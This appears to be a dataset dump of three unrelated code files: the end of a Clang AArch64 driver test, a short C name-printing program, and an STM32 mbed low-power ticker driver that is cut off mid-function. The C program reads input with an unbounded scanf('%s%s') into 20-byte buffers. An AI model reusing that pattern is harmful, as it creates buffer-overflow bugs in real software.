// V82ANORAS: "-target-feature" "-ras"
// RAS is off by default for v8a, but can be enabled by +ras (this is not architecturally valid)
// RUN: %clang -target aarch64 -march=armv8a+ras -### -c %s 2>&1 | FileCheck -check-prefix=V8ARAS -check-prefix=GENERIC %s
// RUN: %clang -target aarch64 -march=armv8-a+ras -### -c %s 2>&1 | FileCheck -check-prefix=V8ARAS -check-prefix=GENERIC %s
// V8ARAS: "-target-feature" "+ras"
// ================== Check whether -march accepts mixed-case values.
// RUN: %clang -target aarch64_be -march=ARMV8.1A -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV81A-BE %s
// RUN: %clang -target aarch64_be -march=ARMV8.1-A -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV81A-BE %s
// RUN: %clang -target aarch64 -mbig-endian -march=Armv8.1A -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV81A-BE %s
// RUN: %clang -target aarch64 -mbig-endian -march=Armv8.1-A -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV81A-BE %s
// RUN: %clang -target aarch64_be -mbig-endian -march=ARMv8.1a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV81A-BE %s
// RUN: %clang -target aarch64_be -mbig-endian -march=ARMV8.1-a -### -c %s 2>&1 | FileCheck -check-prefix=GENERICV81A-BE %s
// GENERICV81A-BE: "-cc1"{{.*}} "-triple" "aarch64_be{{.*}}" "-target-cpu" "generic" "-target-feature" "+neon" "-target-feature" "+v8.1a"
// ================== Check whether -mcpu and -mtune accept mixed-case values.
// RUN: %clang -target aarch64 -mcpu=Cortex-a53 -### -c %s 2>&1 | FileCheck -check-prefix=CASE-INSENSITIVE-CA53 %s
// RUN: %clang -target aarch64 -mtune=Cortex-a53 -### -c %s 2>&1 | FileCheck -check-prefix=CASE-INSENSITIVE-CA53-TUNE %s
// CASE-INSENSITIVE-CA53: "-cc1"{{.*}} "-triple" "aarch64{{.*}}" "-target-cpu" "cortex-a53"
// CASE-INSENSITIVE-CA53-TUNE: "-cc1"{{.*}} "-triple" "aarch64{{.*}}" "-target-cpu" "generic"
// RUN: %clang -target arm64 -mcpu=cortex-A53 -### -c %s 2>&1 | FileCheck -check-prefix=CASE-INSENSITIVE-ARM64-CA53 %s
// RUN: %clang -target arm64 -mtune=cortex-A53 -### -c %s 2>&1 | FileCheck -check-prefix=CASE-INSENSITIVE-ARM64-CA53-TUNE %s
// CASE-INSENSITIVE-ARM64-CA53: "-cc1"{{.*}} "-triple" "arm64{{.*}}" "-target-cpu" "cortex-a53"
// CASE-INSENSITIVE-ARM64-CA53-TUNE: "-cc1"{{.*}} "-triple" "arm64{{.*}}" "-target-cpu" "generic"
// RUN: %clang -target aarch64 -mcpu=CORTEX-A57 -### -c %s 2>&1 | FileCheck -check-prefix=CASE-INSENSITIVE-CA57 %s
// RUN: %clang -target aarch64 -mtune=CORTEX-A57 -### -c %s 2>&1 | FileCheck -check-prefix=CASE-INSENSITIVE-CA57-TUNE %s
// CASE-INSENSITIVE-CA57: "-cc1"{{.*}} "-triple" "aarch64{{.*}}" "-target-cpu" "cortex-a57"
// CASE-INSENSITIVE-CA57-TUNE: "-cc1"{{.*}} "-triple" "aarch64{{.*}}" "-target-cpu" "generic"
// RUN: %clang -target arm64 -mcpu=Cortex-A57 -### -c %s 2>&1 | FileCheck -check-prefix=CASE-INSENSITIVE-ARM64-CA57 %s
// RUN: %clang -target arm64 -mtune=Cortex-A57 -### -c %s 2>&1 | FileCheck -check-prefix=CASE-INSENSITIVE-ARM64-CA57-TUNE %s
// CASE-INSENSITIVE-ARM64-CA57: "-cc1"{{.*}} "-triple" "arm64{{.*}}" "-target-cpu" "cortex-a57"
// CASE-INSENSITIVE-ARM64-CA57-TUNE: "-cc1"{{.*}} "-triple" "arm64{{.*}}" "-target-cpu" "generic"
|
the_stack_data/932712.c | #include <stdio.h>
#include <string.h>
int main(int argc, char *argv[])
{
char first[20] , sur[20];
scanf("%s%s", first, sur);
int len_fisrt = strlen(first), len_sur = strlen(sur);
printf("%s %s\n%*.d %*.d", first, sur, -len_fisrt, len_fisrt, -len_sur, len_sur);
return 0;
} |
the_stack_data/184517387.c | /* mbed Microcontroller Library
*******************************************************************************
* Copyright (c) 2018, STMicroelectronics
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions are met:
*
* 1. Redistributions of source code must retain the above copyright notice,
* this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright notice,
* this list of conditions and the following disclaimer in the documentation
* and/or other materials provided with the distribution.
* 3. Neither the name of STMicroelectronics nor the names of its contributors
* may be used to endorse or promote products derived from this software
* without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
* AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
* DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
* SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
* CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
* OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
* OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*******************************************************************************
*/
#if DEVICE_LPTICKER
/***********************************************************************/
/* lpticker_lptim config is 1 in json config file */
/* LPTICKER is based on LPTIM feature from ST drivers. RTC is not used */
#if MBED_CONF_TARGET_LPTICKER_LPTIM
#include "lp_ticker_api.h"
#include "mbed_error.h"
#include "mbed_power_mgmt.h"
#include "platform/mbed_critical.h"
#include <stdbool.h>
/* lpticker delay is for using C++ Low Power Ticker wrapper,
* which introduces extra delays. We rather want to use the
* low level implementation from this file */
#if defined(LPTICKER_DELAY_TICKS) && (LPTICKER_DELAY_TICKS > 0)
#warning "lpticker_delay_ticks usage not recommended"
#endif
#define LP_TIMER_WRAP(val) (val & 0xFFFF)
/* Safe guard is the number of ticks between the current tick and the next
* tick we want to program an interrupt for. Programing an interrupt in
* between is unreliable */
#define LP_TIMER_SAFE_GUARD 5
#if defined(DUAL_CORE) && (TARGET_STM32H7)
#if defined(CORE_CM7)
#define LPTIM_MST_BASE LPTIM4_BASE
#define LPTIM_MST ((LPTIM_TypeDef *)LPTIM_MST_BASE)
#define RCC_PERIPHCLK_LPTIM RCC_PERIPHCLK_LPTIM4
#define RCC_LPTIMCLKSOURCE_LSE RCC_LPTIM4CLKSOURCE_LSE
#define RCC_LPTIMCLKSOURCE_LSI RCC_LPTIM4CLKSOURCE_LSI
#define LPTIM_MST_IRQ LPTIM4_IRQn
#define LPTIM_MST_RCC __HAL_RCC_LPTIM4_CLK_ENABLE
#define LPTIM_MST_RCC_CLKAM __HAL_RCC_LPTIM4_CLKAM_ENABLE
/* Enable LPTIM wakeup source but only for current core, and disable it for the other core */
#define LPTIM_MST_EXTI_LPTIM_WAKEUP_CONFIG() {\
HAL_EXTI_D1_EventInputConfig(EXTI_LINE52, EXTI_MODE_IT, ENABLE);\
HAL_EXTI_D2_EventInputConfig(EXTI_LINE52, EXTI_MODE_IT, DISABLE);\
}
#define LPTIM_MST_RESET_ON __HAL_RCC_LPTIM4_FORCE_RESET
#define LPTIM_MST_RESET_OFF __HAL_RCC_LPTIM4_RELEASE_RESET
//#define LPTIM_MST_BIT_WIDTH 32 // 16 or 32
//#define LPTIM_MST_PCLK 1 // Select the peripheral clock number (1 or 2)
#elif defined(CORE_CM4)
#define LPTIM_MST_BASE LPTIM5_BASE
#define LPTIM_MST ((LPTIM_TypeDef *)LPTIM_MST_BASE)
#define RCC_PERIPHCLK_LPTIM RCC_PERIPHCLK_LPTIM5
#define RCC_LPTIMCLKSOURCE_LSE RCC_LPTIM5CLKSOURCE_LSE
#define RCC_LPTIMCLKSOURCE_LSI RCC_LPTIM5CLKSOURCE_LSI
#define LPTIM_MST_IRQ LPTIM5_IRQn
#define LPTIM_MST_RCC __HAL_RCC_LPTIM5_CLK_ENABLE
#define LPTIM_MST_RCC_CLKAM __HAL_RCC_LPTIM5_CLKAM_ENABLE
/* Enable LPTIM wakeup source but only for current core, and disable it for the other core */
#define LPTIM_MST_EXTI_LPTIM_WAKEUP_CONFIG() {\
HAL_EXTI_D2_EventInputConfig(EXTI_LINE53, EXTI_MODE_IT, ENABLE);\
HAL_EXTI_D1_EventInputConfig(EXTI_LINE53, EXTI_MODE_IT, DISABLE);\
}
#define LPTIM_MST_RESET_ON __HAL_RCC_LPTIM5_FORCE_RESET
#define LPTIM_MST_RESET_OFF __HAL_RCC_LPTIM5_RELEASE_RESET
#else // (CORE_CM7) or (CORE_CM4)
#error "Core not supported"
#endif
#else // (DUAL_CORE) && (TARGET_STM32H7)
#define LPTIM_MST_BASE LPTIM1_BASE
#define LPTIM_MST ((LPTIM_TypeDef *)LPTIM_MST_BASE)
#define RCC_PERIPHCLK_LPTIM RCC_PERIPHCLK_LPTIM1
#define RCC_LPTIMCLKSOURCE_LSE RCC_LPTIM1CLKSOURCE_LSE
#define RCC_LPTIMCLKSOURCE_LSI RCC_LPTIM1CLKSOURCE_LSI
#if defined(STM32G051xx) || defined(STM32G061xx) || defined(STM32G071xx) || defined(STM32G081xx) || defined(STM32G0B1xx) || defined(STM32G0C1xx)
#define LPTIM_MST_IRQ TIM6_DAC_LPTIM1_IRQn
#else // STM32G0xx
#define LPTIM_MST_IRQ LPTIM1_IRQn
#endif // STM32G0xx
#define LPTIM_MST_RCC __HAL_RCC_LPTIM1_CLK_ENABLE
#define LPTIM_MST_RESET_ON __HAL_RCC_LPTIM1_FORCE_RESET
#define LPTIM_MST_RESET_OFF __HAL_RCC_LPTIM1_RELEASE_RESET
#endif // (DUAL_CORE) && (TARGET_STM32H7)
LPTIM_HandleTypeDef LptimHandle;
const ticker_info_t *lp_ticker_get_info()
{
static const ticker_info_t info = {
#if MBED_CONF_TARGET_LSE_AVAILABLE
LSE_VALUE / MBED_CONF_TARGET_LPTICKER_LPTIM_CLOCK,
#else
LSI_VALUE / MBED_CONF_TARGET_LPTICKER_LPTIM_CLOCK,
#endif
16
};
return &info;
}
volatile uint8_t lp_Fired = 0;
/* Flag and stored counter to handle delayed programing at low level */
volatile bool lp_delayed_prog = false;
volatile bool future_event_flag = false;
volatile bool roll_over_flag = false;
volatile bool lp_cmpok = false;
volatile timestamp_t lp_delayed_counter = 0;
volatile bool sleep_manager_locked = false;
static int LPTICKER_inited = 0;
static void LPTIM_IRQHandler(void);
void lp_ticker_init(void)
{
/* Check if LPTIM is already configured */
if (LPTICKER_inited) {
lp_ticker_disable_interrupt();
return;
}
LPTICKER_inited = 1;
RCC_PeriphCLKInitTypeDef RCC_PeriphCLKInitStruct = {0};
RCC_OscInitTypeDef RCC_OscInitStruct = {0};
#if MBED_CONF_TARGET_LSE_AVAILABLE
/* Enable LSE clock */
RCC_OscInitStruct.OscillatorType = RCC_OSCILLATORTYPE_LSE;
#if MBED_CONF_TARGET_LSE_BYPASS
RCC_OscInitStruct.LSEState = RCC_LSE_BYPASS;
#else
RCC_OscInitStruct.LSEState = RCC_LSE_ON;
#endif
RCC_OscInitStruct.PLL.PLLState = RCC_PLL_NONE;
/* Select the LSE clock as LPTIM peripheral clock */
RCC_PeriphCLKInitStruct.PeriphClockSelection = RCC_PERIPHCLK_LPTIM;
#if (TARGET_STM32L0)
RCC_PeriphCLKInitStruct.LptimClockSelection = RCC_LPTIMCLKSOURCE_LSE;
#else
#if (LPTIM_MST_BASE == LPTIM1_BASE)
RCC_PeriphCLKInitStruct.Lptim1ClockSelection = RCC_LPTIMCLKSOURCE_LSE;
#elif (LPTIM_MST_BASE == LPTIM3_BASE) || (LPTIM_MST_BASE == LPTIM4_BASE) || (LPTIM_MST_BASE == LPTIM5_BASE)
RCC_PeriphCLKInitStruct.Lptim345ClockSelection = RCC_LPTIMCLKSOURCE_LSE;
#endif /* LPTIM_MST_BASE == LPTIM1 */
#endif /* TARGET_STM32L0 */
#else /* MBED_CONF_TARGET_LSE_AVAILABLE */
/* Enable LSI clock */
#if TARGET_STM32WB
RCC_OscInitStruct.OscillatorType = RCC_OSCILLATORTYPE_LSI1;
#else
RCC_OscInitStruct.OscillatorType = RCC_OSCILLATORTYPE_LSI;
#endif
RCC_OscInitStruct.LSIState = RCC_LSI_ON;
RCC_OscInitStruct.PLL.PLLState = RCC_PLL_NONE;
/* Select the LSI clock as LPTIM peripheral clock */
RCC_PeriphCLKInitStruct.PeriphClockSelection = RCC_PERIPHCLK_LPTIM;
#if (TARGET_STM32L0)
RCC_PeriphCLKInitStruct.LptimClockSelection = RCC_LPTIMCLKSOURCE_LSI;
#else
#if (LPTIM_MST_BASE == LPTIM1_BASE)
RCC_PeriphCLKInitStruct.Lptim1ClockSelection = RCC_LPTIMCLKSOURCE_LSI;
#elif (LPTIM_MST_BASE == LPTIM3_BASE) || (LPTIM_MST_BASE == LPTIM4_BASE) || (LPTIM_MST_BASE == LPTIM5_BASE)
RCC_PeriphCLKInitStruct.Lptim345ClockSelection = RCC_LPTIMCLKSOURCE_LSI;
#endif /* LPTIM_MST_BASE == LPTIM1 */
#endif /* TARGET_STM32L0 */
#endif /* MBED_CONF_TARGET_LSE_AVAILABLE */
#if defined(DUAL_CORE) && (TARGET_STM32H7)
while (LL_HSEM_1StepLock(HSEM, CFG_HW_RCC_SEMID)) {
}
#endif /* DUAL_CORE */
if (HAL_RCC_OscConfig(&RCC_OscInitStruct) != HAL_OK) {
error("HAL_RCC_OscConfig ERROR\n");
return;
}
if (HAL_RCCEx_PeriphCLKConfig(&RCC_PeriphCLKInitStruct) != HAL_OK) {
error("HAL_RCCEx_PeriphCLKConfig ERROR\n");
return;
}
LPTIM_MST_RCC();
LPTIM_MST_RESET_ON();
LPTIM_MST_RESET_OFF();
#if defined(DUAL_CORE) && (TARGET_STM32H7)
/* Configure EXTI wakeup and configure autonomous mode */
LPTIM_MST_RCC_CLKAM();
LPTIM_MST_EXTI_LPTIM_WAKEUP_CONFIG();
LL_HSEM_ReleaseLock(HSEM, CFG_HW_RCC_SEMID, HSEM_CR_COREID_CURRENT);
#endif /* DUAL_CORE */
/* Initialize the LPTIM peripheral */
LptimHandle.Instance = LPTIM_MST;
LptimHandle.State = HAL_LPTIM_STATE_RESET;
LptimHandle.Init.Clock.Source = LPTIM_CLOCKSOURCE_APBCLOCK_LPOSC;
#if defined(MBED_CONF_TARGET_LPTICKER_LPTIM_CLOCK)
#if (MBED_CONF_TARGET_LPTICKER_LPTIM_CLOCK == 128)
LptimHandle.Init.Clock.Prescaler = LPTIM_PRESCALER_DIV128;
#elif (MBED_CONF_TARGET_LPTICKER_LPTIM_CLOCK == 64)
LptimHandle.Init.Clock.Prescaler = LPTIM_PRESCALER_DIV64;
#elif (MBED_CONF_TARGET_LPTICKER_LPTIM_CLOCK == 32)
LptimHandle.Init.Clock.Prescaler = LPTIM_PRESCALER_DIV32;
#elif (MBED_CONF_TARGET_LPTICKER_LPTIM_CLOCK == 16)
LptimHandle.Init.Clock.Prescaler = LPTIM_PRESCALER_DIV16;
#elif (MBED_CONF_TARGET_LPTICKER_LPTIM_CLOCK == 8)
LptimHandle.Init.Clock.Prescaler = LPTIM_PRESCALER_DIV8;
#elif (MBED_CONF_TARGET_LPTICKER_LPTIM_CLOCK == 4)
LptimHandle.Init.Clock.Prescaler = LPTIM_PRESCALER_DIV4;
#elif (MBED_CONF_TARGET_LPTICKER_LPTIM_CLOCK == 2)
LptimHandle.Init.Clock.Prescaler = LPTIM_PRESCALER_DIV2;
#else
LptimHandle.Init.Clock.Prescaler = LPTIM_PRESCALER_DIV1;
#endif
#else
LptimHandle.Init.Clock.Prescaler = LPTIM_PRESCALER_DIV1;
#endif /* MBED_CONF_TARGET_LPTICKER_LPTIM_CLOCK */
LptimHandle.Init.Trigger.Source = LPTIM_TRIGSOURCE_SOFTWARE;
#if defined (LPTIM_ACTIVEEDGE_FALLING)
LptimHandle.Init.Trigger.ActiveEdge = LPTIM_ACTIVEEDGE_FALLING;
#endif
#if defined(TARGET_STM32U5)
LptimHandle.Init.Period = 0xFFFF;
#endif
#if defined (LPTIM_TRIGSAMPLETIME_DIRECTTRANSITION)
LptimHandle.Init.Trigger.SampleTime = LPTIM_TRIGSAMPLETIME_DIRECTTRANSITION;
#endif
#if defined(LPTIM_CLOCKPOLARITY_RISING)
LptimHandle.Init.UltraLowPowerClock.Polarity = LPTIM_CLOCKPOLARITY_RISING;
LptimHandle.Init.UltraLowPowerClock.SampleTime = LPTIM_CLOCKSAMPLETIME_DIRECTTRANSITION;
#endif
#if defined(LPTIM_OUTPUTPOLARITY_HIGH)
LptimHandle.Init.OutputPolarity = LPTIM_OUTPUTPOLARITY_HIGH;
#endif
LptimHandle.Init.UpdateMode = LPTIM_UPDATE_IMMEDIATE;
LptimHandle.Init.CounterSource = LPTIM_COUNTERSOURCE_INTERNAL;
#if defined (LPTIM_INPUT1SOURCE_GPIO)
LptimHandle.Init.Input1Source = LPTIM_INPUT1SOURCE_GPIO;
LptimHandle.Init.Input2Source = LPTIM_INPUT2SOURCE_GPIO;
#endif /* LPTIM_INPUT1SOURCE_GPIO */
#if defined(LPTIM_RCR_REP)
LptimHandle.Init.RepetitionCounter = 0;
#endif /* LPTIM_RCR_REP */
if (HAL_LPTIM_Init(&LptimHandle) != HAL_OK) {
error("HAL_LPTIM_Init ERROR\n");
return;
}
#if defined(__HAL_RCC_LPTIM1_CLKAM_ENABLE)
/* Enable autonomous mode for LPTIM1 */
__HAL_RCC_LPTIM1_CLKAM_ENABLE();
#endif
NVIC_SetVector(LPTIM_MST_IRQ, (uint32_t)LPTIM_IRQHandler);
#if (LPTIM_MST_BASE == LPTIM1_BASE)
#if defined (__HAL_LPTIM_LPTIM1_EXTI_ENABLE_IT)
__HAL_LPTIM_LPTIM1_EXTI_ENABLE_IT();
#endif
#endif
#if defined (__HAL_LPTIM_WAKEUPTIMER_EXTI_ENABLE_IT)
/* EXTI lines are not configured by default */
__HAL_LPTIM_WAKEUPTIMER_EXTI_ENABLE_IT();
#endif
#if defined (__HAL_LPTIM_WAKEUPTIMER_EXTI_ENABLE_RISING_EDGE)
__HAL_LPTIM_WAKEUPTIMER_EXTI_ENABLE_RISING_EDGE();
#endif
#if defined(LPTIM_FLAG_DIEROK)
HAL_LPTIM_Counter_Start(&LptimHandle);
__HAL_LPTIM_CLEAR_FLAG(&LptimHandle, LPTIM_FLAG_DIEROK);
__HAL_LPTIM_ENABLE_IT(&LptimHandle, LPTIM_IT_CC1 | LPTIM_IT_CMP1OK);
while (__HAL_LPTIM_GET_FLAG(&LptimHandle, LPTIM_FLAG_DIEROK) == RESET) {
}
/* Need to write a compare value in order to get LPTIM_FLAG_CMPOK in set_interrupt */
__HAL_LPTIM_CLEAR_FLAG(&LptimHandle, LPTIM_FLAG_CMP1OK);
__HAL_LPTIM_COMPARE_SET(&LptimHandle, LPTIM_CHANNEL_1, 0);
while (__HAL_LPTIM_GET_FLAG(&LptimHandle, LPTIM_FLAG_CMP1OK) == RESET) {
}
__HAL_LPTIM_CLEAR_FLAG(&LptimHandle, LPTIM_FLAG_CMP1OK);
#else
__HAL_LPTIM_ENABLE_IT(&LptimHandle, LPTIM_IT_CMPM);
__HAL_LPTIM_ENABLE_IT(&LptimHandle, LPTIM_IT_CMPOK);
HAL_LPTIM_Counter_Start(&LptimHandle, 0xFFFF);
/* Need to write a compare value in order to get LPTIM_FLAG_CMPOK in set_interrupt */
__HAL_LPTIM_CLEAR_FLAG(&LptimHandle, LPTIM_FLAG_CMPOK);
__HAL_LPTIM_COMPARE_SET(&LptimHandle, 0);
while (__HAL_LPTIM_GET_FLAG(&LptimHandle, LPTIM_FLAG_CMPOK) == RESET) {
}
__HAL_LPTIM_CLEAR_FLAG(&LptimHandle, LPTIM_FLAG_CMPOK);
#endif
/* Init is called with Interrupts disabled, so the CMPOK interrupt
* will not be handled. Let's mark it is now safe to write to LP counter */
lp_cmpok = true;
}
static void LPTIM_IRQHandler(void)
{
core_util_critical_section_enter();
if (lp_Fired) {
lp_Fired = 0;
/* We're already in handler and interrupt might be pending,
* so clear the flag, to avoid calling irq_handler twice */
#if defined(LPTIM_FLAG_CC1)
__HAL_LPTIM_CLEAR_FLAG(&LptimHandle, LPTIM_FLAG_CC1);
#else
__HAL_LPTIM_CLEAR_FLAG(&LptimHandle, LPTIM_FLAG_CMPM);
#endif
lp_ticker_irq_handler();
}
/* Compare match interrupt */
#if defined(LPTIM_FLAG_CC1)
if (__HAL_LPTIM_GET_FLAG(&LptimHandle, LPTIM_FLAG_CC1) != RESET) {
if (__HAL_LPTIM_GET_IT_SOURCE(&LptimHandle, LPTIM_IT_CC1) != RESET) {
/* Clear Compare match flag */
__HAL_LPTIM_CLEAR_FLAG(&LptimHandle, LPTIM_FLAG_CC1);
lp_ticker_irq_handler();
}
}
#else
if (__HAL_LPTIM_GET_FLAG(&LptimHandle, LPTIM_FLAG_CMPM) != RESET) {
if (__HAL_LPTIM_GET_IT_SOURCE(&LptimHandle, LPTIM_IT_CMPM) != RESET) {
/* Clear Compare match flag */
__HAL_LPTIM_CLEAR_FLAG(&LptimHandle, LPTIM_FLAG_CMPM);
lp_ticker_irq_handler();
}
}
#endif
#if defined(LPTIM_FLAG_CMP1OK)
if (__HAL_LPTIM_GET_FLAG(&LptimHandle, LPTIM_FLAG_CMP1OK) != RESET) {
if (__HAL_LPTIM_GET_IT_SOURCE(&LptimHandle, LPTIM_IT_CMP1OK) != RESET) {
__HAL_LPTIM_CLEAR_FLAG(&LptimHandle, LPTIM_FLAG_CMP1OK);
#else
if (__HAL_LPTIM_GET_FLAG(&LptimHandle, LPTIM_FLAG_CMPOK) != RESET) {
if (__HAL_LPTIM_GET_IT_SOURCE(&LptimHandle, LPTIM_IT_CMPOK) != RESET) {
__HAL_LPTIM_CLEAR_FLAG(&LptimHandle, LPTIM_FLAG_CMPOK);
#endif
lp_cmpok = true;
if (sleep_manager_locked) {
sleep_manager_unlock_deep_sleep();
sleep_manager_locked = false;
}
if (lp_delayed_prog) {
if (roll_over_flag) {
/* If we were close to the roll over of the ticker counter
* change current tick so it can be compared with buffer.
* If this event got outdated fire interrupt right now,
* else schedule it normally. */
if (lp_delayed_counter <= ((lp_ticker_read() + LP_TIMER_SAFE_GUARD + 1) & 0xFFFF)) {
lp_ticker_fire_interrupt();
} else {
lp_ticker_set_interrupt((lp_delayed_counter - LP_TIMER_SAFE_GUARD - 1) & 0xFFFF);
}
roll_over_flag = false;
} else {
if (future_event_flag && (lp_delayed_counter <= lp_ticker_read())) {
/* If this event got outdated fire interrupt right now,
* else schedule it normally. */
lp_ticker_fire_interrupt();
future_event_flag = false;
} else {
lp_ticker_set_interrupt(lp_delayed_counter);
}
}
lp_delayed_prog = false;
}
}
}
#if defined (__HAL_LPTIM_WAKEUPTIMER_EXTI_CLEAR_FLAG)
/* EXTI lines are not configured by default */
__HAL_LPTIM_WAKEUPTIMER_EXTI_CLEAR_FLAG();
#endif
core_util_critical_section_exit();
}
uint32_t lp_ticker_read(void)
{
uint32_t lp_time = LPTIM_MST->CNT;
/* Reading the LPTIM_CNT register may return unreliable values.
It is necessary to perform two consecutive read accesses and verify that the two returned values are identical */
while (lp_time != LPTIM_MST->CNT) {
lp_time = LPTIM_MST->CNT;
}
return lp_time;
}
/* This function should always be called from critical section */
void lp_ticker_set_interrupt(timestamp_t timestamp)
{
core_util_critical_section_enter();
timestamp_t last_read_counter = lp_ticker_read();
/* Always store the last requested timestamp */
lp_delayed_counter = timestamp;
NVIC_EnableIRQ(LPTIM_MST_IRQ);
/* CMPOK is set by hardware to inform application that the APB bus write operation to the
* LPTIM_CMP register has been successfully completed.
* Any successive write before the CMPOK flag be set, will lead to unpredictable results
* We need to prevent to set a new comparator value before CMPOK flag is set by HW */
if (lp_cmpok == false) {
/* if this is not safe to write, then delay the programing to the
* time when CMPOK interrupt will trigger */
/* If this target timestamp is close to the roll over of the ticker counter
* and current tick is also close to the roll over, then we are in danger zone.*/
if (((0xFFFF - LP_TIMER_SAFE_GUARD < timestamp) || (timestamp < LP_TIMER_SAFE_GUARD)) && (0xFFFA < last_read_counter)) {
roll_over_flag = true;
/* Change the lp_delayed_counter buffer in that way so the value of (0xFFFF - LP_TIMER_SAFE_GUARD) is equal to 0.
* By doing this it is easy to check if the value of timestamp get outdated by delaying its programming
* For example if LP_TIMER_SAFE_GUARD is set to 5
* (0xFFFA + LP_TIMER_SAFE_GUARD + 1) & 0xFFFF = 0
* (0xFFFF + LP_TIMER_SAFE_GUARD + 1) & 0xFFFF = 5
* (0x0000 + LP_TIMER_SAFE_GUARD + 1) & 0xFFFF = 6
* (0x0005 + LP_TIMER_SAFE_GUARD + 1) & 0xFFFF = 11*/
lp_delayed_counter = (timestamp + LP_TIMER_SAFE_GUARD + 1) & 0xFFFF;
} else {
roll_over_flag = false;
/* Check if event was meant to be in the past. */
if (lp_delayed_counter >= last_read_counter) {
future_event_flag = true;
} else {
future_event_flag = false;
}
}
lp_delayed_prog = true;
} else {
lp_ticker_clear_interrupt();
/* HW is not able to trig a very short term interrupt, that is
* not less than few ticks away (LP_TIMER_SAFE_GUARD). So let's make sure it'
* s at least current tick + LP_TIMER_SAFE_GUARD */
for (uint8_t i = 0; i < LP_TIMER_SAFE_GUARD; i++) {
if (LP_TIMER_WRAP((last_read_counter + i)) == timestamp) {
timestamp = LP_TIMER_WRAP((timestamp + LP_TIMER_SAFE_GUARD));
}
}
/* Then check if this target timestamp is not in the past, or close to wrap-around
* Let's assume last_read_counter = 0xFFFC, and we want to program timestamp = 0x100
* The interrupt will not fire before the CMPOK flag is OK, so there are 2 cases:
* in case CMPOK flag is set by HW after or at wrap-around, then this will fire only @0x100
* in case CMPOK flag is set before, it will indeed fire early, as for the wrap-around case.
* But that will take at least 3 cycles and the interrupt fires at the end of a cycle.
* In our case 0xFFFC + 3 => at the transition between 0xFFFF and 0.
* If last_read_counter was 0xFFFB, it should be at the transition between 0xFFFE and 0xFFFF.
* There might be crossing cases where it would also fire @ 0xFFFE, but by the time we read the counter,
* it may already have moved to the next one, so for now we've taken this as margin of error.
*/
if ((timestamp < last_read_counter) && (last_read_counter <= (0xFFFF - LP_TIMER_SAFE_GUARD))) {
/* Workaround, because limitation */
#if defined(LPTIM_CHANNEL_1)
__HAL_LPTIM_COMPARE_SET(&LptimHandle, LPTIM_CHANNEL_1, ~0);
#else
__HAL_LPTIM_COMPARE_SET(&LptimHandle, ~0);
#endif
} else {
/* It is safe to write */
#if defined(LPTIM_CHANNEL_1)
__HAL_LPTIM_COMPARE_SET(&LptimHandle, LPTIM_CHANNEL_1, timestamp);
#else
__HAL_LPTIM_COMPARE_SET(&LptimHandle, timestamp);
#endif
}
/* We just programed the CMP so we'll need to wait for cmpok before
* next programing */
lp_cmpok = false;
/* Prevent from sleeping after compare register was set as we need CMPOK
* interrupt to fire (in ~3x30us cycles) before we can safely enter deep sleep mode */
if (!sleep_manager_locked) {
sleep_manager_lock_deep_sleep();
sleep_manager_locked = true;
}
}
core_util_critical_section_exit();
}
void lp_ticker_fire_interrupt(void)
{
core_util_critical_section_enter();
lp_Fired = 1;
/* In case we fire interrupt now, then cancel pending programing */
lp_delayed_prog = false;
NVIC_SetPendingIRQ(LPTIM_MST_IRQ);
NVIC_EnableIRQ(LPTIM_MST_IRQ);
core_util_critical_section_exit();
}
void lp_ticker_disable_interrupt(void)
{
core_util_critical_section_enter();
if (!lp_cmpok) {
#if defined(LPTIM_FLAG_CMP1OK)
while (__HAL_LPTIM_GET_FLAG(&LptimHandle, LPTIM_FLAG_CMP1OK) == RESET) {
}
__HAL_LPTIM_CLEAR_FLAG(&LptimHandle, LPTIM_FLAG_CMP1OK);
#else
while (__HAL_LPTIM_GET_FLAG(&LptimHandle, LPTIM_FLAG_CMPOK) == RESET) {
}
__HAL_LPTIM_CLEAR_FLAG(&LptimHandle, LPTIM_FLAG_CMPOK);
#endif
lp_cmpok = true;
}
/* now that CMPOK is set, allow deep sleep again */
if (sleep_manager_locked) {
sleep_manager_unlock_deep_sleep();
sleep_manager_locked = false;
}
lp_delayed_prog = false;
lp_Fired = 0;
NVIC_DisableIRQ(LPTIM_MST_IRQ);
NVIC_ClearPendingIRQ(LPTIM_MST_IRQ);
core_util_critical_section_exit();
}
void lp_ticker_clear_interrupt(void)
{
core_util_critical_section_enter();
#if defined(LPTIM_FLAG_CC1)
__HAL_LPTIM_CLEAR_FLAG(&LptimHandle, LPTIM_FLAG_CC1);
#else
__HAL_LPTIM_CLEAR_FLAG(&LptimHandle, LPTIM_FLAG_CMPM);
#endif
NVIC_ClearPendingIRQ(LPTIM_MST_IRQ);
core_util_critical_section_exit();
}
void lp_ticker_free(void)
{
lp_ticker_disable_interrupt();
}
/*****************************************************************/
/* lpticker_lptim config is 0 or not defined in json config file */
/* LPTICKER is based on RTC wake up feature from ST drivers */
#else /* MBED_CONF_TARGET_LPTICKER_LPTIM */
#include "rtc_api_hal.h"
const ticker_info_t *lp_ticker_get_info()
{
static const ticker_info_t info = {
RTC_CLOCK / 4, // RTC_WAKEUPCLOCK_RTCCLK_DIV4
32
};
return &info;
}
void lp_ticker_init(void)
{
rtc_init();
